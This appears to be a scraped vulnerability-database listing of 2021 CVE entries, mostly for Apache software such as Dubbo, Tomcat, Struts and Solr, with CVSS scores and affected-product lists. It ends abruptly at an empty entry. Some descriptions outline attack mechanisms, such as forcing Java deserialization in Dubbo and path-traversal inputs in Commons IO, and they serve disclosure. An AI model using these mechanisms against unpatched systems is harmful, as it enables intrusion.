apache openoffice 4.1.8
CVE-2021-28131 MEDIUM

Impala sessions use a 16 byte secret to verify that the session is not being hijacked by another user. However, these secrets appear in the Impala logs, therefore Impala users with access to the logs can use another authenticated user's sessions with specially constructed requests. This means the attacker is able to execute statements for which they don't have the necessary privileges otherwise. Impala deployments with Apache Sentry or Apache Ranger authorization enabled may be vulnerable to privilege escalation if an authenticated attacker is able to hijack a session or query from another authenticated user with privileges not assigned to the attacker. Impala deployments with audit logging enabled may be vulnerable to incorrect audit logging as a user could undertake actions that were logged under the name of a different authenticated user. Constructing an attack requires a high degree of technical sophistication and access to the Impala system as an authenticated user. Mitigation: If an Impala deployment uses Apache Sentry, Apache Ranger or audit logging, then users should upgrade to a version of Impala with the fix for IMPALA-10600. The Impala 4.0 release includes this fix. This hides session secrets from the logs to eliminate the risk of any attack using this mechanism. In lieu of an upgrade, restricting access to logs that expose secrets will reduce the risk of an attack. Restricting access to the Impala deployment to trusted users will also reduce the risk of an attack. Log redaction techniques can be used to redact secrets from the logs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-288,CWE-532,

Products Affected

Vendor Product Version
apache impala *
CVE-2021-28163 MEDIUM

In Eclipse Jetty 9.4.32 to 9.4.38, 10.0.0.beta2 to 10.0.1, and 11.0.0.beta2 to 11.0.1, if a user uses a webapps directory that is a symlink, the contents of the webapps directory is deployed as a static webapp, inadvertently serving the webapps themselves and anything else that might be in that directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
emo@eclipse.org 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N 1.2 1.4
nvd@nist.gov 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N 1.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-59,

Products Affected

Vendor Product Version
eclipse jetty 11.0.1
oracle communications_session_route_manager *
netapp santricity_cloud_connector -
netapp e-series_performance_analyzer -
oracle banking_apis 21.1
apache solr 8.8.1
eclipse jetty 11.0.0
eclipse jetty 10.0.0
netapp e-series_santricity_os_controller *
eclipse jetty *
oracle communications_session_report_manager *
fedoraproject fedora 32
netapp element_plug-in_for_vcenter_server -
fedoraproject fedora 34
oracle banking_digital_experience 20.1
netapp vasa_provider_for_clustered_data_ontap *
oracle banking_digital_experience 21.1
eclipse jetty 10.0.1
apache ignite *
oracle communications_services_gatekeeper 7.0
netapp e-series_santricity_web_services -
netapp snapcenter -
netapp storage_replication_adapter_for_clustered_data_ontap *
oracle communications_element_manager 8.2.2
oracle siebel_core_-_automation *
netapp snapcenter_plug-in -
netapp cloud_manager -
oracle autovue_for_agile_product_lifecycle_management 21.0.2
netapp virtual_storage_console *
fedoraproject fedora 33
oracle banking_apis 20.1
CVE-2021-28359 MEDIUM

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions <1.10.15 in 1.x series and affects 2.0.0 and 2.0.1 and 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515 but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH releases of the installed MINOR versions, example update to Python 3.6.13 if you are on Python 3.6. (Those contain the fix for CVE-2021-23336 https://nvd.nist.gov/vuln/detail/CVE-2021-23336).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-28544 LOW

Apache Subversion SVN authz protected copyfrom paths regression Subversion servers reveal 'copyfrom' paths that should be hidden according to configured path-based authorization (authz) rules. When a node has been copied from a protected location, users with access to the copy can see the 'copyfrom' path of the original. This also reveals the fact that the node was copied. Only the 'copyfrom' path is revealed; not its contents. Both httpd and svnserve servers are vulnerable.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apple macos *
apache subversion *
fedoraproject fedora 36
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2021-28655

The improper Input Validation vulnerability in "”Move folder to Trash” feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-28656

Cross-Site Request Forgery (CSRF) vulnerability in Credential page of Apache Zeppelin allows an attacker to submit malicious request. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-28657 MEDIUM

A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,CWE-835,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle healthcare_foundation 8.0.0
apache tika *
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle healthcare_foundation 8.1.0
oracle webcenter_portal 12.2.1.4.0
oracle communications_messaging_server 8.1
oracle healthcare_foundation 7.3.0
CVE-2021-29200 HIGH

Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-29262 MEDIUM

When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,CWE-522,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-29425 MEDIUM

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-22,

Products Affected

Vendor Product Version
oracle financial_services_model_management_and_governance *
oracle rest_data_services *
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_session_border_controller 9.0
apache commons_io 2.2
oracle banking_apis 18.2
oracle health_sciences_data_management_workbench 2.5.2.1
oracle communications_interactive_session_recorder 6.3
oracle flexcube_core_banking 11.10.0
oracle banking_digital_experience 18.3
oracle primavera_unifier *
oracle insurance_rules_palette 11.2.8
oracle retail_xstore_point_of_service 18.0.3
oracle banking_digital_experience 19.1
oracle retail_integration_bus 15.0.3.1
oracle solaris_cluster 4.0
oracle retail_pricing 19.0.1
oracle weblogic_server 12.2.1.3.0
oracle retail_merchandising_system 19.0.1
oracle communications_offline_mediation_controller 12.0.0.3
oracle communications_billing_and_revenue_management_elastic_charging_engine 11.3
oracle webcenter_portal 12.2.1.3.0
oracle retail_assortment_planning 16.0.3
oracle helidon 1.4.7
oracle communications_cloud_native_core_unified_data_repository 1.4.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0
oracle application_performance_management 13.5.1.0
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle weblogic_server 14.1.1.0.0
oracle communications_order_and_service_management 7.3
oracle banking_platform 2.6.2
oracle banking_apis 18.3
oracle retail_service_backbone 15.0.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_design_studio 7.3.5
oracle communications_order_and_service_management 7.4
oracle communications_contacts_server 8.0.0.6.0
oracle retail_integration_bus 14.1.3.2
oracle banking_apis 18.1
oracle application_performance_management 13.4.1.0
oracle retail_integration_bus 13.0
oracle flexcube_core_banking 5.2.0
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle primavera_unifier 21.12
oracle banking_enterprise_default_management 2.7.0
apache commons_io 2.5
oracle health_sciences_information_manager *
oracle banking_digital_experience 18.1
oracle oss_support_tools *
oracle retail_service_backbone *
oracle health_sciences_data_management_workbench 3.0.0.0
oracle retail_integration_bus 19.0.1
oracle banking_apis 19.2
oracle banking_enterprise_default_management 2.10.0
oracle insurance_rules_palette 11.0.2
oracle communications_converged_application_server_-_service_controller 6.2
oracle communications_convergence 3.0.2.2.0
oracle retail_integration_bus 19.0.0
apache commons_io 2.4
oracle insurance_policy_administration 11.1.0
oracle access_manager 12.2.1.3.0
oracle enterprise_communications_broker 3.3
oracle communications_policy_management 12.5.0.0.0
oracle banking_enterprise_default_management 2.6.2
oracle banking_enterprise_default_management 2.7.1
oracle retail_integration_bus 14.1.3.0
oracle retail_xstore_point_of_service 20.0.1
oracle retail_merchandising_system 16.0.3
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle agile_plm 9.3.6
oracle blockchain_platform *
oracle flexcube_core_banking *
oracle retail_service_backbone 19.0.1
oracle communications_cloud_native_core_policy 1.14.0
apache commons_io 2.3
oracle communications_application_session_controller 3.9.0
oracle insurance_rules_palette 11.1.0
oracle banking_digital_experience 17.2
debian debian_linux 9.0
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle rest_data_services 21.3
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle retail_order_broker 19.1
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle communications_interactive_session_recorder 6.4
oracle access_manager 12.2.1.4.0
oracle retail_service_backbone 19.0.0
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_enterprise_default_management 2.12.0
apache commons_io 2.6
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_rules_palette 11.3.0
oracle helidon 2.2.0
oracle access_manager 11.1.2.3.0
oracle commerce_guided_search 11.3.2
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle communications_design_studio *
oracle banking_apis 21.1
oracle retail_integration_bus *
oracle banking_party_management 2.7.0
oracle insurance_rules_palette 11.3.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle banking_enterprise_default_managment *
oracle communications_diameter_intelligence_hub *
oracle retail_service_backbone 14.1.3.0
oracle weblogic_server 12.2.1.4.0
oracle real_user_experience_insight 13.4.1.0
oracle communications_service_broker 6.2
oracle banking_platform *
oracle retail_order_broker 16.0
oracle real_user_experience_insight 13.5.1.0
oracle communications_cloud_native_core_network_repository_function 1.14.0
oracle retail_xstore_point_of_service 19.0.2
oracle communications_pricing_design_center 12.0.0.5.0
netapp active_iq_unified_manager -
oracle retail_service_backbone 14.1.3.2
oracle communications_pricing_design_center 12.0.0.4.0
oracle enterprise_session_border_controller 8.4
oracle retail_order_broker 18.0
oracle retail_size_profile_optimization 16.0.3
oracle weblogic_server 12.1.3.0.0
CVE-2021-29621 MEDIUM

Flask-AppBuilder is a development framework, built on top of Flask. User enumeration in database authentication in Flask-AppBuilder <= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in. Upgrade to version 3.3.0 or higher to resolve.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,CWE-203,

Products Affected

Vendor Product Version
flask-appbuilder_project flask-appbuilder *
apache airflow 1.10.0
CVE-2021-29943 MEDIUM

When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-30128 HIGH

Apache OFBiz has unsafe deserialization prior to 17.12.07 version

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-30129 MEDIUM

A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,

Products Affected

Vendor Product Version
oracle banking_payments 14.5
oracle communications_cloud_native_core_console 1.9.0
oracle flexcube_universal_banking *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
apache sshd *
oracle flexcube_universal_banking 14.5
oracle banking_treasury_management 14.5
oracle retail_customer_management_and_segmentation_foundation 18.0
oracle middleware_common_libraries_and_tools 14.1.1.0.0
oracle banking_trade_finance 14.5
oracle middleware_common_libraries_and_tools 12.2.1.3.0
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle oss_support_tools 2.12.42
CVE-2021-30179 HIGH

Apache Dubbo prior to 2.6.9 and 2.7.9 by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the second one is an array with the parameter types for the method being invoked and the third one is an array with the actual call arguments. In addition, the caller also needs to set an RPC attachment specifying that the call is a generic call and how to decode the arguments. The possible values are: - true - raw.return - nativejava - bean - protobuf-json An attacker can control this RPC attachment and set it to nativejava to force the java deserialization of the byte array located in the third argument.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30180 MEDIUM

Apache Dubbo prior to 2.7.9 support Tag routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers may enable calling arbitrary constructors.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30181 HIGH

Apache Dubbo prior to 2.6.9 and 2.7.9 supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30245 MEDIUM

The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to be careful opening documents from unknown and unverified sources. The mitigation in Apache OpenOffice 4.1.10 (unreleased) assures that a security warning is displayed giving the user the option of continuing to open the hyperlink.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-610,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-30468 MEDIUM

A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-835,

Products Affected

Vendor Product Version
oracle business_intelligence 12.2.1.4.0
apache tomee 8.0.6
apache cxf *
oracle communications_messaging_server 8.1
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_element_manager 8.2.2
CVE-2021-30638 MEDIUM

Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-863,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2021-30639 MEDIUM

A vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache tomcat 8.5.64
apache tomcat 10.0.3
apache tomcat 10.0.4
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
apache tomcat 9.0.44
oracle big_data_spatial_and_graph *
CVE-2021-30640 MEDIUM

A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N 2.2 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-116,

Products Affected

Vendor Product Version
apache tomcat *
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
debian debian_linux 9.0
oracle communications_pricing_design_center 12.0.0.3.0
debian debian_linux 10.0
oracle tekelec_platform_distribution *
oracle communications_diameter_signaling_router *
oracle communications_cloud_native_core_policy 1.14.0
debian debian_linux 11.0
CVE-2021-30641 MEDIUM

Apache HTTP Server versions 2.4.39 to 2.4.46 Unexpected matching behavior with 'MergeSlashes OFF'

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2021-31164 MEDIUM

Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-93,CWE-74,

Products Affected

Vendor Product Version
apache unomi *
CVE-2021-31522 HIGH

Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-470,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2021-31618 MEDIUM

Apache HTTP Server protocol handler for the HTTP/2 protocol checks received request headers against the size limitations as configured for the server and used for the HTTP/1 protocol as well. On violation of these restrictions and HTTP response is sent to the client with a status code indicating why the request was rejected. This rejection response was not fully initialised in the HTTP/2 protocol handler if the offending header was the very first one received or appeared in a a footer. This led to a NULL pointer dereference on initialised memory, crashing reliably the child process. Since such a triggering HTTP/2 request is easy to craft and submit, this can be exploited to DoS the server. This issue affected mod_http2 1.15.17 and Apache HTTP Server version 2.4.47 only. Apache HTTP Server 2.4.47 was never released.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 34
apache http_server 2.4.47
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
apache http_server 1.15.17
fedoraproject fedora 33
CVE-2021-31805 HIGH

The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,CWE-917,

Products Affected

Vendor Product Version
apache struts *
CVE-2021-31811 MEDIUM

In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,CWE-770,

Products Affected

Vendor Product Version
oracle banking_supply_chain_finance 14.2.0
oracle primavera_unifier 20.12
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle retail_customer_management_and_segmentation_foundation 18.1
oracle banking_credit_facilities_process_management 14.3.0
oracle primavera_unifier 18.8
oracle flexcube_universal_banking *
apache pdfbox *
oracle flexcube_universal_banking 14.5
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_treasury_management 14.5
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
oracle primavera_unifier 19.12
fedoraproject fedora 34
oracle outside_in_technology 8.5.5
oracle banking_trade_finance 14.5
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_credit_facilities_process_management 14.2.0
oracle primavera_unifier *
oracle communications_messaging_server 8.1
fedoraproject fedora 33
CVE-2021-31812 MEDIUM

In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,CWE-835,

Products Affected

Vendor Product Version
oracle banking_supply_chain_finance 14.2.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle retail_customer_management_and_segmentation_foundation 18.1
oracle banking_credit_facilities_process_management 14.3.0
apache pdfbox *
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
fedoraproject fedora 34
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_credit_facilities_process_management 14.2.0
oracle communications_messaging_server 8.1
fedoraproject fedora 33
CVE-2021-32565 MEDIUM

Invalid values in the Content-Length header sent to Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32566 MEDIUM

Improper Input Validation vulnerability in HTTP/2 of Apache Traffic Server allows an attacker to DOS the server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32567 MEDIUM

Improper Input Validation vulnerability in HTTP/2 of Apache Traffic Server allows an attacker to DOS the server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32609 LOW

Apache Superset up to and including 1.1 does not sanitize titles correctly on the Explore page. This allows an attacker with Explore access to save a chart with a malicious title, injecting html (including scripts) into the page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-32824

